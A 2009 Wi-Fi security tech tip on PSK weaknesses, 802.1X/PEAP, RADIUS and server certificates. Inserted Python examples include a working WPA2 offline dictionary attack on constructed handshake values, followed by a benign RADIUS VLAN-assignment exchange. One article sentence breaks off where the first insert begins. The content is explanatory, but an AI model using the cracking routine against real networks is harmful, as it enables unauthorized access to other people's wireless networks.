Businesses that deploy wireless access must prevent unauthorized use and asset exposure. Failure to do so could have serious consequences -- no company wants to make Wi-Fi breach headlines like TJX and Heartland did, or deal with costly attack cleanup and recovery.
However, many WLAN administrators at midmarket companies find themselves torn. The simple pre-shared keys (PSKs) designed for homes and small businesses are limiting and risky. On the other hand, strong 802.1X access control requires enterprise-class authentication infrastructure, including RADIUS servers and digital certificates. Fortunately, there are simple-but-safe approaches for security-conscious businesses short on staff and cash.
Understanding PSK Risks
Wireless LANs secured with WPA-Personal or WPA2-Personal PSKs are more difficult to penetrate than those using the old, broken WEP or easily-spoofed MAC Access Control Lists (ACLs). It is still important to avoid short PSKs composed of dictionary words, especially with common SSIDs: the PSK is derived from the passphrase with the SSID as salt, so attackers precompute tables of candidate keys for popular default SSIDs and reuse them against every network that shares that name. But random PSKs that exceed 20 characters, combined with unique SSIDs, can deter rapid cracking by tools such as CoWPAtty and
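To make the SSID's role concrete, here is a worked example, added here and not code from the article or from CoWPAtty, that derives a WPA2 pairwise master key the way 802.11i specifies, computes the handshake MIC a cracker tests candidates against, and runs a small offline dictionary attack. The network name, MAC addresses, nonces, EAPOL frame bytes and word list are all constructed for the example; the only real value is the 802.11i reference pair "password"/"IEEE" used to check the key derivation.

```python
import hashlib
import hmac

# Constructed sample network and 4-way handshake values (not a real capture).
SSID = "linksys"                      # a common default name, as the text warns against
TRUE_PASSPHRASE = "sunflower77"       # the secret the attacker is trying to recover
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 with its 16-byte MIC field zeroed; a cracker takes this and the
# MIC from the capture. The bytes here are filler with the right overall shape.
EAPOL_M2_ZEROED = bytes.fromhex("0103007502010a00000000000000000001") + SNONCE + bytes(50)
WORDLIST = ["password", "letmein", "linksys", "sunflower77", "Tr0ub4dor&3"]


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i passphrase-to-PSK mapping: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 256 bits.
    Because the SSID is the salt, a precomputed PMK table is only valid for one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, keep 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key from the PMK, both MACs and both nonces; all of those are sent in clear."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(ptk: bytes, eapol_zeroed: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 truncated to 128 bits under the KCK (first 16 bytes of the PTK)."""
    return hmac.new(ptk[:16], eapol_zeroed, hashlib.sha1).digest()[:16]


def captured_mic() -> bytes:
    """Stand-in for the MIC read from the sniffed handshake: computed here from the true passphrase."""
    ptk = wpa2_ptk(wpa2_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk, EAPOL_M2_ZEROED)


def crack(ssid: str, wordlist, mic: bytes):
    """Offline dictionary attack: a candidate is right when it reproduces the captured MIC."""
    for candidate in wordlist:
        ptk = wpa2_ptk(wpa2_pmk(candidate, ssid), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(ptk, EAPOL_M2_ZEROED), mic):
            return candidate
    return None


def pmk_self_check() -> bool:
    """802.11i Annex H reference vector: passphrase 'password' on SSID 'IEEE'."""
    return wpa2_pmk("password", "IEEE").hex() == (
        "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")


if __name__ == "__main__":
    mic = captured_mic()
    print("PMK derivation matches 802.11i vector:", pmk_self_check())
    print("recovered on SSID %r: %r" % (SSID, crack(SSID, WORDLIST, mic)))
    # Same handshake material, different SSID: every candidate PMK differs, so a table
    # built for "linksys" is useless against a uniquely named network.
    print("same wordlist against SSID 'CoreComp-2F':", crack("CoreComp-2F", WORDLIST, mic))
```

Each candidate costs 4096 HMAC-SHA1 iterations, which is what limits online-style guessing but not a precomputed table; the table is defeated only by a unique SSID or a passphrase long and random enough to be outside any word list.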
Unfortunately, even good PSKs share human-induced vulnerabilities that plague any group password. Everyone using your WLAN logs in using the same PSK -- if an employee loses a laptop, gets fired, or gives your PSK to a guest, all bets are off. Depending upon the size and savvy of your workforce, updating your WLAN's PSK can be an operational and security nightmare.
Businesses should thus exercise caution when relying upon PSKs for WLAN access control. For example, long random PSKs might be a reasonable choice for embedded systems such as point-of-sale devices and printers -- so long as they are physically secured to prevent theft. Temporary PSKs, issued daily, may also be a workable solution for guest Internet access in cases where the goal is simply to discourage unauthorized use.
Reaping 802.1X Benefits
Where PSKs just won't do, there are two alternatives: 802.1X port access control or captive portal authentication. Captive portals, which authenticate users through a web page on an otherwise open network, suit hospitality and education WLANs that need only to restrict access. 802.1X is more appropriate for business WLANs that also require over-the-air data privacy, because a successful 802.1X login yields the per-session keying material that WPA/WPA2 use to encrypt each user's traffic; a captive portal leaves that traffic unencrypted unless some other layer, such as a VPN, protects it.
802.1X is supported by all Wi-Fi products that have passed WPA-Enterprise or WPA2-Enterprise certification. This not only includes business-grade access points (APs), but nearly every home AP and laptop Wi-Fi adapter. Today, the only devices that cannot support 802.1X tend to be "headless" consumer electronics and small purpose-built devices such as Wi-Fi barcode scanners and VoIP handsets.
Broad support also means that one big 802.1X deployment challenge has dissipated. Specifically, it is no longer necessary to install client software on every wireless device; 802.1X supplicants are now included in contemporary operating systems. After-market 802.1X supplicants can still be installed to meet advanced needs like Network Access Control (NAC) integration. However, password-based log-in can usually be accomplished by native 802.1X supplicants using Protected EAP (PEAP) / MS-CHAPv2.
When using 802.1X with PEAP, every individual logs into the WLAN with their own password. This eliminates group password and PSK-cracking risks and provides more granular control over (and visibility into) WLAN usage. Not only does it become possible to track each user's access and satisfy audit requests, but 802.1X provides a mechanism to control permissions. Users can be given wireless access to different resources based upon their authenticated identity -- for example, mapping contractors, engineers, and accountants onto different virtual LANs or subnets.
Under the Hood
802.1X client installation may no longer be required, but the WLAN itself still needs 802.1X server infrastructure. Specifically, access control decisions move from individual wireless APs to a central authentication server, reached via RADIUS: the AP acts as a RADIUS client, relaying the user's EAP conversation to the server and enforcing whatever Access-Accept or Access-Reject comes back. That authentication server becomes responsible for permitting or denying access, based upon the user's identity and credentials.
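The exchange described above, as an added example that is neither the article's code nor any real RADIUS server's: an AP acting as RADIUS client sends an Access-Request, a minimal server answers with an Access-Accept carrying the RFC 2868 tunnel attributes that map the user onto a VLAN (the contractor/engineer/accountant mapping mentioned earlier), and the AP verifies the Response Authenticator with the shared secret before trusting that decision. The usernames, VLAN numbers and secret are constructed. The EAP conversation that PEAP would carry inside the Access-Request/Access-Challenge exchange is omitted, as is the Message-Authenticator attribute (RFC 3579) that EAP over RADIUS requires.

```python
import hashlib
import hmac
import os
import struct

# RADIUS codes and attribute types (RFC 2865) and tunnel attributes (RFC 2868).
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, NAS_PORT_TYPE = 1, 61
TUNNEL_TYPE, TUNNEL_MEDIUM_TYPE, TUNNEL_PRIVATE_GROUP_ID = 64, 65, 81
TUNNEL_TYPE_VLAN, TUNNEL_MEDIUM_802, NAS_PORT_WIRELESS = 13, 6, 19
DEFAULT_VLAN = 1  # what the AP uses when an Accept carries no VLAN assignment (constructed)

# Constructed policy: authenticated identity -> VLAN (hypothetical names and numbers).
VLAN_POLICY = {"contractor1": 30, "engineer1": 10, "accountant1": 20}


def attr(atype: int, value: bytes) -> bytes:
    """Type-Length-Value attribute; Length counts the whole attribute."""
    return struct.pack("!BB", atype, 2 + len(value)) + value


def tagged(atype: int, tag: int, value: bytes) -> bytes:
    """RFC 2868 tunnel attribute: a 1-byte tag groups attributes that belong together."""
    return attr(atype, bytes([tag]) + value)


def parse_attrs(packet: bytes) -> dict:
    """Attributes start at offset 20, after Code, Identifier, Length and the 16-byte Authenticator."""
    attrs, pos = {}, 20
    while pos + 2 <= len(packet):
        atype, alen = packet[pos], packet[pos + 1]
        if alen < 2 or pos + alen > len(packet):
            raise ValueError("malformed attribute")
        attrs[atype] = packet[pos + 2:pos + alen]
        pos += alen
    if pos != len(packet):
        raise ValueError("trailing bytes after attributes")
    return attrs


def nas_access_request(username: str):
    """AP side. The Request Authenticator is 16 random bytes the AP must remember for the reply."""
    ident, req_auth = os.urandom(1)[0], os.urandom(16)
    body = attr(USER_NAME, username.encode()) + attr(NAS_PORT_TYPE, NAS_PORT_WIRELESS.to_bytes(4, "big"))
    return struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(body)) + req_auth + body, ident, req_auth


def radius_server(request: bytes, secret: bytes) -> bytes:
    """Server side: decide, then sign the reply as MD5(header || Request Authenticator || attributes || secret)."""
    code, ident, _ = struct.unpack("!BBH", request[:4])
    req_auth = request[4:20]
    user = parse_attrs(request).get(USER_NAME, b"").decode(errors="replace")
    vlan = VLAN_POLICY.get(user)
    if code != ACCESS_REQUEST or vlan is None:
        reply_code, reply_attrs = ACCESS_REJECT, []
    else:
        reply_code = ACCESS_ACCEPT
        reply_attrs = [tagged(TUNNEL_TYPE, 1, TUNNEL_TYPE_VLAN.to_bytes(3, "big")),
                       tagged(TUNNEL_MEDIUM_TYPE, 1, TUNNEL_MEDIUM_802.to_bytes(3, "big")),
                       tagged(TUNNEL_PRIVATE_GROUP_ID, 1, str(vlan).encode())]
    body = b"".join(reply_attrs)
    header = struct.pack("!BBH", reply_code, ident, 20 + len(body))
    resp_auth = hashlib.md5(header + req_auth + body + secret).digest()
    return header + resp_auth + body


def nas_handle_reply(reply: bytes, ident: int, req_auth: bytes, secret: bytes):
    """AP side: refuse any reply whose Response Authenticator does not verify under the shared secret.
    Returns the VLAN to place the client in, or None when access is rejected."""
    code, rid, length = struct.unpack("!BBH", reply[:4])
    if rid != ident or length != len(reply):
        raise ValueError("reply does not match the outstanding request")
    expected = hashlib.md5(reply[:4] + req_auth + reply[20:] + secret).digest()
    if not hmac.compare_digest(expected, reply[4:20]):
        raise ValueError("bad Response Authenticator: wrong secret or forged reply")
    if code != ACCESS_ACCEPT:
        return None
    attrs = parse_attrs(reply)
    if (attrs.get(TUNNEL_TYPE, b"")[1:] != TUNNEL_TYPE_VLAN.to_bytes(3, "big")
            or attrs.get(TUNNEL_MEDIUM_TYPE, b"")[1:] != TUNNEL_MEDIUM_802.to_bytes(3, "big")):
        return DEFAULT_VLAN
    return int(attrs[TUNNEL_PRIVATE_GROUP_ID][1:])


def authenticate(username: str, nas_secret: bytes, server_secret: bytes):
    """Run both sides in-process; in production the packets cross the wire on UDP/1812."""
    request, ident, req_auth = nas_access_request(username)
    reply = radius_server(request, server_secret)
    return nas_handle_reply(reply, ident, req_auth, nas_secret)


if __name__ == "__main__":
    for name in ("contractor1", "engineer1", "nobody"):
        print(name, "->", authenticate(name, b"s3cret", b"s3cret"))
```

The point of the authenticator check is that the AP only hands out the VLAN (or network access at all) on the word of a server that knows the shared secret, which is why that secret deserves the same care as any other infrastructure credential, and why RFC 3579 adds an HMAC-based Message-Authenticator on top of this MD5 construction for EAP traffic.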
802.1X can be used to support many kinds of wireless authentication, but most (including PEAP / MS-CHAPv2) tunnel the log-in dialog between the user and server over TLS. This secure tunnel stops wireless hackers from capturing passwords, but it also requires that the server have a digital certificate.
Issuing a single certificate to an authentication server is not costly or onerous. Self-signed certificates can be generated by open source tools such as OpenSSL, but purchasing a certificate signed by a trusted root authority such as VeriSign is safer and ultimately easier. Users will be able to verify the server's identity to avoid Evil Twin attacks, without the hassle of distributing self-signed server certificates to every client. One caveat: that protection exists only if supplicants are configured to validate the server certificate and to accept only your authentication server's name. A supplicant that skips validation, or that trusts any certificate issued by a public root, will start PEAP with a rogue AP just as readily and expose the MS-CHAPv2 exchange to offline cracking.
But what about the authentication server? This is the hurdle that stops many WLAN administrators from using 802.1X. Enterprises have the budget and staff to establish RADIUS infrastructure -- in fact, many already have RADIUS servers for remote access VPN authentication. 802.1X was intentionally designed to let enterprises leverage those pre-existing RADIUS investments, including policies and user credentials.
Read part two of this technical tip, which covers the server infrastructure required to support wireless authentication.
Lisa Phifer is vice president of Core Competence Inc. She has been involved in the design, implementation and evaluation of networking, security and management products for more than 25 years, and has advised companies large and small regarding security needs, product assessment, and the use of emerging technologies and best practices.
Send comments on this technical tip to firstname.lastname@example.org.
This was first published in March 2009